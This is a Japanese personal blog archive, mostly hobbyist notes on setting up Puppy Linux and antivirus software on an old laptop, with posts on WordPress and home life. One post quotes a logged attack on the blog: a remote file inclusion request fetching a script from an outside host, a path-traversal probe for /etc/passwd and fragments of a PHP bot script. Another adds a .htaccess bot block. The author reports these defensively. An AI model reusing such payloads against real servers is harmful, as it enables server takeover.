カテゴリー
Linux

懸案のLoox-#8。

LuPuのウイルス対策をどうしようかという話。
前回Ver4.3.1にClamAvを入れたときはあまり満足いく結果は得られなかった。「Puppyの日本語フォーラム」を見ると,FRUGALインストールの場合すぐに初期状態に復帰できるし,Linuxのウィルスはそれほど多くないから,ときどきスキャンする程度でいいという意見が大勢を占めている。しかし,我がLooxはFULLインストールだし……何とか,対策ソフトを常駐させるところまで,持っていきたいネ。

というわけで,28日(月)に取り組んでみた。
WinでのフリーソフトはAviraを使っているので,これをインストールして見たのだが,現バージョンからはUIが削られてて,結構操作が難しい。あきらめて,楽に行きそうだという Avastの現バージョン (http://files.avast.com/files/linux/avast4workstation_1.3.0-2_i386.deb) を入れてみた。すんなり,インストールでき,レジストしてconsoleからavastguiを打ったら,あっさり立ち上がったので,「やった!!」と思ったんだが,Update databaseでこけちゃいました。
An error occurred in avast! engine: Invalid argument
がでるようになり,どうしてもダメ。お手上げ。この日は,あきらめた。

で,今日(30日)ググってみてたんだけど,2chの記事(http://pc11.2ch.net/test/read.cgi/linux/1186329249/)にUbuntuがらみで,

Ubuntu の avast! Antivirus が変   でググって
ttp://eunheui.cocolog-nifty.com/ubuntu/2010/03/ubuntu-avast-an.html によると
sudo gedit /etc/init.d/rcS として

exec /etc/init.d/rc S という行の前に
sysctl -w kernel.shmmax=128000000
という行を挿入して、Ubuntu を再起動します。 とのこと

というのがあった。shmmaxのサイズで引っかかっているらしい。同じところをPuppyで見てみたが,kernel.shmmaxの設定場所が違うようだ。やっぱ駄目かなと思いつつ,shmmax puppy avastでググったら,ありました。
http://www.murga-linux.com/puppy/viewtopic.php?t=54475
これを参考に,以下のことをやったら,エラーが消えて無事,アップデート完了。

/proc/sys/kernel/shmmaxを開いて値を確認。
33554432 です。
consoleから
# /sbin/sysctl -w kernel/shmmax=200000000を打つと
kernel.shmmax = 200000000 が出る。
もう一度/proc/sys/kernel/shmmaxを確認。
200000000 になってます。

それと,メニューがちゃんとできなかったので,デスクトップから,Avast.desktopを開けるようにショートカットを作成。
で,フルスキャンして見ました。問題なし。

それは,いいんだけど,常駐させるためには,もう一個問題が……難関,Dazukoのインストールです。(泣)
苦難は続く。しかも,読んでみると,Dazukoをウイルス対策ソフトより先にインストしなくてはいけないらしいではないですか。あちゃー。

  • 追記:えー,Dazukoを入れようと,よくわからないカーネルいじりにもがいていたら,LooxがUSBやPC Cardを認識しなくなっちゃいました。もう一回,一からやり直さなくちゃいけないみたいっす。(痛っ)
  • 追記#2:kernel.shmmax = 200000000 にしたときから,気になっているんだけど,これはこんな中途半端な数でいいのかなぁ。もともとの33554432は33554432÷1024÷1024=32だから,32MBだよね。209715200(200MB)とかにする必要はないのかな? Linux,素人だから悩んでます……
カテゴリー
WordPress

アクセス制限。

先日,梅の実(今日の落下分)で書いたように,ブログページへのbotがあまりに激しいので,共通するユーザーエージェントで制限して見ようと思って,.htaccessに以下を追加して見た。

SetEnvIf User-Agent “libwww-perl” ng_ua
Order allow,deny
Allow from all
Deny from env=ng_ua

効果あるだろか。

追記:
先日,Casper_Cell Parijatah sronoをググッたときはあまり情報がなかったんだけど,今日.htaccessを変更してから,libwww-perlで調べたら,かなり前から報告のあるphpライブラリの悪用方法のようですね。「変更前に調べろよ」と,突っ込まれそうですが,サーバ初心者なので……(苦笑)
http://gigazine.net/index.php?/news/comments/20070410_libwww/
http://www.hazama.nu/t2o2/archives/002711.shtml
本当は,マルスクリプト内の用語で弾くべきなんだろうけど,それはもう少し勉強してからにします。今のところ,ユーザーエージェントで’libwww-perl’を名乗ってるのはスパムばかりなので,前記の.htaccessで大丈夫そうです。

カテゴリー
everyday life

折り紙のサッカーボール。

世はW杯ですね。我が家は,ウィンブルドンなんですが,でも,23日の日は次試合の勝利の祈りを込めて,サッカーボールを折ってたんですよぉ。

手間がかかるので(32枚のユニット折り紙です。),その日には,出来上がらなくて,今日やっと出来上がったんですが,お祈りは通じたかも。
こちらを参考に折りました。自作する方ってほんとうに脱帽です。
http://casinoslotjackpot.blog102.fc2.com/blog-entry-152.html

手持ちの折り紙で作ったので,サッカーボールらしくないですが……今回のボールは違いますが,サッカーボールというと,やはり,「白黒」&「五角形・六角形」ですよねぇ!!

カテゴリー
Linux

懸案のLoox-#7。

この間のLooxの記事で,LucidPuppyをFULLインストールしたと書いたけど,その経過報告。

Lucid Puppy 5.01のFULLインストール

FRUGALインストールのときの1.2.を行う。その後は以下の通り。

  1. ユニバーサルインストーラから,内蔵ATA-HDD上の/sda1上にPuppyをFULLインストール。続けて,GRUBをインストール。
  2. lupusave.2fsを作成せずにシャットダウン。
  3. 再起動。
  4. /boot/grubのmenu.lstを以下のように編集。
    • timeout 3
    • title Linux (on /dev/sda1)
    • root (hd0,0)
    • kernel /boot/vmlinuz root=/dev/sda1 ro vga=normal
  5. マウスのクリック設定をデフォルトのシングルクリックから,ダブルクリックに変更。
    デスクトップ上のファイルアイコンをクリックして,ROXファイルマネージャを開く。開いたウインドウ内を右クリックして,現れるショートカットメニューから「オプション設定」を選んで開く。その中の「ファイラーウィンドウ」「ピンボート」の項目中に「シングルクリックで開く」という項目があるので,このチェックをはずす。
  6. Pet_Maker-1.7-3.petをインストールし,これを使って,lang_support_ja-1.4.sfsをpetとしてインストール。 不具合―デスクトップの表示とメニュー項目が日本語にならない。  <<<<  日本語化
  7. openoffice-3.2-dpup-sfs4.sfsをpetとしてインストール。これを起動したら,JREのrequireがでたので,jre- 1.6.0.20.petをインストール。デスクトップにショートカットができないので,/opt/openoffice/ooo-dev3 /program/の各実行ファイルから,デスクトップのショートカットを作り,iconを/usr/local/lib/X11/pixmaps/に あるOOoのデフォルト画像に変更。
  8. メニューのネットワークからファイアウォールを設定。デフォルトのまま。
  9. Corega PCC-TXDを設定し,インターネットに接続。ブラウザを選択,火狐にする。Firefox-3.6.3-Lucid.petが,Quickpetによ り自動的にダウンロード。インストール。http://releases.mozilla.org/pub/mozilla.org/firefox/releases/(Firefoxのバージョン)/win32/xpi/ja.xpiからダウンロードしたja.xpiをAdd-onとしてインストール。URL欄で,about:configを開いて general.useragent.locale jaに設定後,火狐を再起動。メニューの日本語化成功。で,インストール後,更新の確認をしたら,3.6.4が出ていて,自動で更新成功。妙に感動した。 Adobe Flashについても警告が出たので,for Linux.tar.gzをダウンロードし,展開後,/usr/lib/mozilla/pluginsのファイルを/tmpに出来たlibflashplayer.soで上 書き。
  10. Ver4.3.1のときと同じく,/etc/rc.d/rc.networkをあけて,MAXWAIT=14したのだが,頻繁に接続が切れるの で,MAXWAIT=24に増やしたら改善した。
  11. 自宅のサーバにドメイン名で接続できるよう /etc/hosts に本家のドメイン名を記載。
  12. Wine-1.1.43-Lucid.petをインストール。いつも重宝しているDiskMirroringToolと日記ソフトをインストールして使っ てみた。使えた。Win2Kのサポートが7月13日に完全に終わるということで,今,Win2Kが入っているPCの後継OSにPuppyを考えているの で,このあたり重要です。
  13. デスクトップの背景画像を手持ちの「木星」に変えてみた。

さて,現在のLuPuのデスクトップ画像を載せておきます。こんな感じです。

カテゴリー
WordPress

WordPress 3.0 日本語版インストール。

6月18日にWordPress 3.0「セロニアス」リリースということで,日本語版3.0はいつだろうなぁと思っていましたら,早くも昨日(6月22日),リリースされたようです。ということで,アップグレードしてみました。

  1. データベースとファイルのバックアップを行う。
  2. すべてのプラグインの使用を停止する。
  3. ツール > アップグレード(/wp-admin/update-core.php)にアクセスする。
  4. 「自動アップグレードを実行」をクリックする。
  5. 「WordPress のアップグレードを完了しました。」と表示されたら、プラグインを有効化する。

なんですが,案の定,ここ(ToyPark)では自動アップグレードはできませんでした。で,上記,3.4.については,FTP経由で手動で行いました。それが,手間だっただけで,特に,データベースの手直しなどの必要もなく,無事アップグレードが完成。

めでたし,めでたし。

追記:セキュリティ関連か,wp-config.phpに設定項目が,増えていました。

カテゴリー
Linux

懸案のLoox-#6。

06/13(日)から以下に取り組んでいたんだが……。

Lucid Puppy 5.01が出ているということで,LOOXのPuppyを入れ替えることにした。
見つかるpetに含まれているJREなどのバージョンが古くてどうもということもあったし,4.3.1そのものが,かなり前の開発のものだったせいもある。というわけで,以下のとおり。

Lucid Puppy 5.01のFRUGALインストール

  1. USBFDからFreeDosを起動し,FdiskでPuppy4.3.1のあるHDDから全てのパーティションを削除。
  2. wakepupのブートディスクで,USBフラッシュ上にインストールしたLucid Puppy5.0.1を起動。x上のGParted partition managerで,HDD上に/dev/sda1 (boot用 ext2フォーマット)と/dev/sda2 (swap用 linux-swapフォーマット)を切る。
  3. xを終了してコマンドラインから,Grubをインストール。
    • #mkdir /sda1
    • #mount /dev/sda1 /sda1
    • #mkdir /sda1/boot
    • #grub-install –root-directory=/sda1 /dev/sda1
  4. startxでxにもどり,ユニバーサルインストーラから,内蔵ATA-HDD上の/sda1上にPuppyをFRUGALインストール。Puppyが作ってくれたNEWGRUBTEXTを少し編集し,menu.lstにリネームして,Grubフォルダにコピー。
  5. lupusave.2fsを作成せずにシャットダウン。
  6. USBフラッシュをはずし,電源を入れると無事,HDD上のLucid Puppy 5.01が起動。もちろんまだ英語。いろいろ設定ののち,lupusave.2fsを保存して,ひとまず,シャットダウン。これをやらないと,オプションの.sfsがインストールできない。
  7. lang_support_ja-1.3.sfsをインストールして,日本語化に成功。
  8. ところが,Corega PCC-TXDくんの認識にまた苦労した。インストールするときにポピュラーでないドライバ類は,zl501332.sfsにあるという記載があるのだが,.iso内のどこにもこいつがなかった。ググっても,見つからなかったので,もしかしたら後々同梱するつもりで名前だけ入れてるのかもね。しかし,FRUGALでなくFULLインストするとあっさり認識してくれる。しかも,FRUGALのときも,ドライバのaxnet_cs.koはちゃんとmodulesにあるみたいなんだが……。あがいてみたが,結局挫折。よくわからん。
  9. ———->>というわけで,この後,FULLでインストしてみました。Fullだと,.sfsが使えないのが痛い。しかし,問題の重さはあまり変わらない気がする。
カテゴリー
everyday life

梅の実(今日の落下分)

福岡管区気象台は,今日,今年の梅雨入りを発表した。
麦畑の刈り取りもほぼ完了し,今日は旧暦の5月1日というわけで,その日に五月雨(さみだれ)開始なんて,「なんて間がいいんでしょ」,今年は。(笑)

写真は我が家の梅の木から落下した実,本日分のみネ。ふるーいバケツが風流?
で,横はその実を漬けた自家製の梅干し,もちろん,去年のです。これが,うまいんです。赤紫蘇を絞って,紫飯とか,一緒につけた生姜(紅ショウガ,でも実のところ紫といった方がいい色。)なんぞもいいです。

ところで,間が悪いのが,bot。
一昨日,StatPress Reloadedのログを見ていたら不審なユーザエージェントがありましてね。
<?php$Alertbotphp=(“で始まって,{passthru($cmd);} } ?>で終わるんですが,どうやら,PHPのRFIに関する脆弱性をついて,サーバをNetBot化しようというスクリプトのようです。

StatPress Reloadedのログをエクスポートして改めて見たら,
option=com_myblog&task=http://www.tourgaja.net/www/data/casper.txt?
option=com_myblog&task=../../../../../../../../../../../../../../../etc/passwd%00 に続いて,スクリプトを送っているようです。
こんな表題付きでした。

####################################################
##[                                              ]##
##[              casper_kae@yahoo.com            ]##
##[           Created by Kiss_Me or Alert        ]##
##[                 Thanks to mama               ]##
##[           Casper_Cell Parijatah srono        ]##
##[                                              ]##
####################################################

http://ja.forums.wordpress.org/topic/4241 で相談したら,サーバ管理者に連絡した方がいいだろうということだったので,昨日ToyParkにメールして,今のところ,回答待ちなんだけど,その後,ググってみたらこんなのがあった。
http://botnetzprovider.de/cnc1.html (魚拓です)
国内の報告はほとんどないようだけど,このブログは本家のせいで国外からのアクセスも結構あるようだから,そのせいかもしれない。

http://todos.xsrv.jp/2patioweb/todos.cgi?mode=view2&f=10&no=110
にも書いたんだけど,PHPのRFIの脆弱性狙いって,結構あるみたいですよね。サーバ管理者は気をつけないとね。

カテゴリー
Linux

懸案のLoox-#5。

今日は,http://www.ring.gr.jp/archives/linux/puppylinux/sfs4/ から openoffice-3.1.1JP_wJRE1.6.0_17-sfs4.sfsをダウンロードしてインストールした。

.sfsなので,/mnt/home にコピーして,「メニュー」→「セットアップ」→「Puppyセットアップ」→「パピーの基本的な設定」→「パピーのブートアップ設定」からsfsファイルのロードを設定。LOOXを再起動したらセットアップ終了で,デスクトップにオープンオフィスのアイコンがズラッと表示された。

しかし,使ってみたら,重いです。とても,実用には耐えないなぁ。(溜息)

カテゴリー
Linux

懸案のLoox-#4。

えー,相変わらずLOOXのお話。

これは始めからだが,ネットワーク設定を起動のたびに新たにやらなくてはいけなくて,ファイルの保存がうまく行っていないのかと思っていた。暇を見てちょこちょこクグッたりしてはいたが,近ごろは無線LANの時代なので,どうもうまく情報が見つからない。ところが,本日,ほぼピタリの情報を見つけた。

http://sakurapup.browserloadofcoolness.com/viewtopic.php?t=876の09/01/06(火) 22:42のmika-jさんの記事。

—————————ここから引用—————————–
いろいろ、調べてみたところ、アドレスを再設定するのは、/etc/rc.d/rc.network
らしいのですが、このスクリプトが、eth0デバイスの準備ができる前に走りきってしまうため、
アドレスが設定されていないように見えていました。
つまり、デバイスの準備ができていないので、アドレス設定もされない、という事ですね。

—————————ここまで引用—————————–

まさしく,これだと思った。ネットワークウィザードを走らせてやれば,デバイスは間違いなく認識されるわけで,これは,ハード的には問題がないという証拠のような気がしていた。何らかの問題で設定ファイルが保存されないか,上書き等で消去されるのではと思っていたのだが,デバイスの準備よりスクリプトが走るののほうが早いというのは,私にとってはちょっと盲点だった。

で,/etc/rc.d/rc.networkをあけて,MAXWAIT=12(<—この値は秒単位のようだ)となっているのを調整して見た。

なんと,MAXWAIT=14で無事設定されるようになった。ハフッ…,2秒差。Corega PCC-TXDくん,おめでとう。

カテゴリー
Linux

懸案のLoox-#3。

ここのところ,忙しくてLOOXを放りっぱなしだったのだが,27日(木)にjuneさんからclamAVの件でコメントをもらった。これには困った。clamAV-0.91.2はうまく動かないままだったのだ。実のところ,記事からclamAVの件を消しておくべきだったが,juneさんからのコメントで記述していたことに気づいた次第で,書いたことすら忘れていた。juneさんには,一応泥縄で返信を書いたが,そのあたりの顛末を含めて,記事「懸案のLoox-#2。」以降のことを書く。
まだ,途中だけど,あとがいつになるかわからないし……

では,始めます。

えー,21日の夜作成したはずのSeaMonkeyのメッセージフィルタの設定が,全部消えてしまった。―後日談としては,実は,消えていませんでして,何でなのかどうもよくわからない。(泣)

不愉快だし,どうも不安。それで,ftp://ftp.t.ring.gr.jp/pub/linux/puppylinux/packages-stray/Shintani/からsylpheed-3.0.0-i486-koro1.petを落としてきて,インストール。

デスクトップに,ショートカット(Linuxではランチャというものだと思っていたが,Puppyの日本語版ページにはこう書いてある。)を作る。インストールした,sylpheedの実行ファイルは~/.usr/binにあったので,これをデスクトップにドラッグ&ドロップ。歯車型のままでは格好悪いので,右クリックショートカットメニューよりアイコンを設定を選んで,メールアイコンに変更。sylpheedのアイコンがわからなかったので,SeaMonkeyのアイコンで代用。

さて,clamAVのほうも,バージョン0.91.2はうまく動かなかった。私がclamAVを知っていたのは前に使っていた FedoraCoreがらみなのだが,このときは,パッケージをインストールして,コマンドを打ったら動いたので,楽だったけどあまり勉強にはならなかった。今回,動かなかったので,「何でだろう」とは思ったが,ここんとこ忙しくてほったらかし。Looxは,寝かせたままなので害はないです。

ただ,ほったらかしの前にどうも古いclamAVのサポートが終わっているらしいことは分かった。clamAVのオフィシャルサイトでもアナウンス(魚拓です)をしているようだ。うまく動かないのがこれがらみかどうかは別だが。

で,28日帰宅してから,ClamAV – Anti Virus software というページを発見し,0.96.xバージョンをインストールしなおした。

以下のファイルを落としてきて,この順にインストール。

http://http.us.debian.org/debian/pool/main/c/clamav/clamav_0.96+dfsg-4_i386.deb

http://http.us.debian.org/debian/pool/main/c/clamav/libclamav6_0.96+dfsg-4_i386.deb

http://http.us.debian.org/debian/pool/main/libt/libtool/libltdl7_2.2.6b-2_i386.deb

http://http.us.debian.org/debian/pool/main/libt/libtommath/libtommath0_0.39-3_i386.deb

http://http.us.debian.org/debian/pool/main/e/eglibc/libc6_2.10.2-9_i386.deb

ClamAVのページから下記の二つのウイルス定義ファイルを落として,/var/lib/clamav/ (←なかったので,作った)にコピー。
http://db.local.clamav.net/main.cvd
http://db.local.clamav.net/daily.cvd

端末から,clamscanを打ったら,無事走り出した。

しかし,/rootのスキャンだけで,90分22秒。前途多難。

———– SCAN SUMMARY ———–
Known viruses: 787882
Engine version: 0.96
Scanned directories: 1
Scanned files: 29
Infected files: 0
Data scanned: 18.04 MB
Data read: 8.54 MB (ratio 2.11:1)
Time: 5422.044 sec (90 m 22 s)

clamAVをGUIで動かすために,http://sourceforge.net/projects/fetcav/からfetcav-0.5.tar.gzを落として解凍し,install.shがうまく動かなかったので,手動で,fetcav.shを~/.usr/sbinにコピー。デスクトップにショートカットを作る。fetcavを走らせて基本設定を保存。

常駐はさせていないけど,Puppyにはもともとファイヤーウォールの設定があるし,今のところclamAVについてはこれでいいかな。